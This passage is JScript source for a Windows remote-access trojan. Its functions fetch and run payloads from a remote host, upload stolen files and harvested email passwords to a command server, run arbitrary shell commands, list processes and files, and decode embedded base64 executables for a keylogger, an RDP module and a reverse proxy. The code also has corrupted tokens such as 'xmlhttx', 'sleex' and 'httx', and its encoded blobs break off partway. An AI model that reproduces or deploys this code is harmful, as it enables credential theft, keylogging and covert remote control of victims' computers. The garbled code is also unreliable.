var cfg= "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTip=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C 08 08 08 08 08 08 08 01 08 08 08 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 08 08 08 08 08 08 08 08 88 02 08 08 E8 01 08 00\nColumns=FA 08 08 08 FA 08 01 08 6E 08 02 08 6E 08 03 08 78 08 04 08 78 08 05 08 78 08 06 08 64 08 07 08 FA 08 08 00\nSort=0";
var writer = filesystemobj.openTextFile(config_file, 2, true);
writer.writeLine(cfg);
writer.close();
writer = null;
var strlink = fileurl;
var strsaveto= installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttx");
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control:","max-age=0");
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
if (objhttpdownload.status == 280)
{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}
if(objfsodownload.fileExists(strsaveto))
{
var runner = WScript.CreateObject("Shell.Application");
var saver = objfsodownload.getFile(strsaveto).shortPath
for(var i=0; i<5; i++)
{
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
WScript.sleep(1008);
runner.shellExecute(saver, "(/stext "+ saver + "data");
WScript.sleex(2800);
if(objfsodownload.fileExists(saver + "data"))
{
var sr = filesystemobj.openTextFile(saver+ "data");
var buffer = sr.readall();
sr.close();
sr = null;
var outpath = installdir+ "wshlogs\\recovered_password_email.log";
var folder = objfsodownload.GetParentFolderName(outpath);
if (!objfsodownload.FolderExists(folder)) {shellobj.run("%comspec% /c mkdir \""+ folder+ "\"", 8, true);}
writer = filesystemobj.openTextFile(outpath, 2, true);
writer.write(buffer);
writer.close();
writer = null;
upload(saver+ "data", retcmd);
break;
}
}
deletefaf(strsaveto);
}
}
function reverseproxy (filename, filearg)
{
shellobj.run("%comspec% /c taskkill /F /IM(" + filename, 8, true);
var strsaveto= installdir + filename;
var objfsodownload= WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){ objfsodownload.deleteFile(strsaveto); }
try
{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(getReverseProxy());
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload= null;
}
catch(err){updatestatus("Access+Denied");}
if(objfsodownload.fileExists(strsaveto)){ shellobj.run("\"" + strsaveto + "\" " + host + "(" + port+ " "+ filearg );}
}
function keyloggerstarter (fileurl, filename, filearg, is_offline, is_rdp)
{
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
var strlink= fileurl;
var strsaveto = installdir+ filename;
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){ objfsodownload.deleteFile(strsaveto);}
try
{
var objstreamdownload= WScript.CreateObject("adodb.stream");
objstreamdownload.Type =1;
objstreamdownload.Open();
if(is_rdp == true){ objstreamdownload.Write(getRDP());}
else { objstreamdownload.Write(getKeyLogger());}
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}
catch(err){updatestatus("Access+Denied");}
if(objfsodownload.fileExists(strsaveto)){ shellobj.run("\""+ strsaveto+ "\"(" + host+ " "+ port +" \""+ filearg + "\" "+ is_offline);}
}
function servicestarter (fileurl, filename, filearg)
{
shellobj.run("%comspec% /c taskkill /F /IM(" + filename, 8, true);
var strlink = fileurl;
var strsaveto= installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp" );
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
var objfsodownload= WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){ objfsodownload.deleteFile(strsaveto);}
if (objhttpdownload.status == 200)
{
try
{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type= 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload= null;
}
catch(err){updatestatus("Access+Denied");}
}
if(objfsodownload.fileExists(strsaveto)){ shellobj.run("\"" + strsaveto + "\" " + host + "(" + port+ " \"" + filearg+ "\"");}
}
function sitedownloader (fileurl,filename)
{
var strlink = fileurl;
var strsaveto= installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp" );
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control","max-age=0");
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){ objfsodownload.deleteFile(strsaveto);}
if (objhttpdownload.status == 200)
{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}
if(objfsodownload.fileExists(strsaveto))
{
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
updatestatus("Executed+File");
}
}
function download (fileurl,filedir)
{
if(filedir==""){ filedir = installdir;}
strsaveto= filedir + fileurl.substr(fileurl.lastIndexOf("\\") + 1);
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post","httx://" + host+ ":"+ port +"/"+ "send-to-me"+ spliter + fileurl, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
var objfsodownload= WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){ objfsodownload.deleteFile(strsaveto);}
if (objhttpdownload.status == 200)
{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type= 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload= null;
}
if(objfsodownload.fileExists(strsaveto))
{
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
updatestatus("Executed+File");
}
}
function updatestatus(status_msg)
{
try
{
var objsoc = WScript.CreateObject("msxml2.xmlhttp");
objsoc.open("post","httx://" + host+ ":"+ port +"/" +"update-status" + spliter + status_msg, false);
objsoc.setRequestHeader("user-agent:", information());
objsoc.send("");
}
catch(err){}
}
function upload(fileurl, retcmd)
{
try
{
var httpobj,objstreamuploade,buffer;
var objstreamuploade= WScript.CreateObject("adodb.stream");
objstreamuploade.Type= 1;
objstreamuploade.Open();
objstreamuploade.loadFromFile(fileurl);
buffer = objstreamuploade.Read();
objstreamuploade.close();
objstreamdownload= null;
var httpobj= WScript.CreateObject("msxml2.xmlhttp");
httpobj.open("post","http://" + host + ":" + port+"/" + retcmd, false);
httpobj.setRequestHeader("user-agent:", information());
httpobj.send(buffer);
}
catch(er){ updatestatus("Upload+Failed");}
}
function deletefaf(url)
{
try
{
filesystemobj.deleteFile(url);
filesystemobj.deleteFolder(url);
}
catch(err){}
}
function cmdshell (cmd)
{
var httpobj,oexec,readallfromany;
var strsaveto = installdir+ "out.txt";
shellobj.run("%comspec% /c " + cmd +" > \"" + strsaveto + "\"", 0, true);
readallfromany= filesystemobj.openTextFile(strsaveto).readAll();
try{filesystemobj.deleteFile(strsaveto);}
catch(ee){}
return readallfromany;
}
function enumprocess(){
var ex ="";
try
{
var objwmiservice = GetObject("winmgmts:\\\\.\\root\\cimv2");
var colitems= objwmiservice.ExecQuery("select * from win32_process",null,48);
for(var fi= new Enumerator(colitems); !fi.atEnd(); fi.moveNext())
{
var objitem = fi.item();
ep= ep + objitem.name + "^";
ex = ep+ objitem.processId + "^";
ex = ep+ objitem.executablePath + spliter;
}
}
catch(er){}
return ex;
}
function exitprocess(pid)
{
try{shellobj.run("taskkill /F /T /PID(" + pid,8,true);}
catch(err){}
}
function getParentDirectory(path)
{
var fo = filesystemobj.getFile(path);
return filesystemobj.getParentFolderName(fo);
}
function enumfaf(enumdir)
{
var re = "";
try{
for(var fi = new Enumerator(filesystemobj.getFolder + (enumdir).subfolders);!fi.atEnd(); fi.moveNext())
{
var folder = fi.item();
re = re+ folder.name + "^^d^" + folder.attributes + spliter;
}
for(var fi= new Enumerator(filesystemobj.getFolder + (enumdir).files); !fi.atEnd(); fi.moveNext())
{
var file = fi.item();
re = re+ file.name+ "^"+ file.size+ "^"+ file.attributes+ spliter;
}
}
catch(err){}
return re;
}
function getKeyLogger()
{
var encoded = "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
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
}
function getRDP()
{
var encoded ="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
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType ="bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
}
function getReverseProxy()
{
var encoded ="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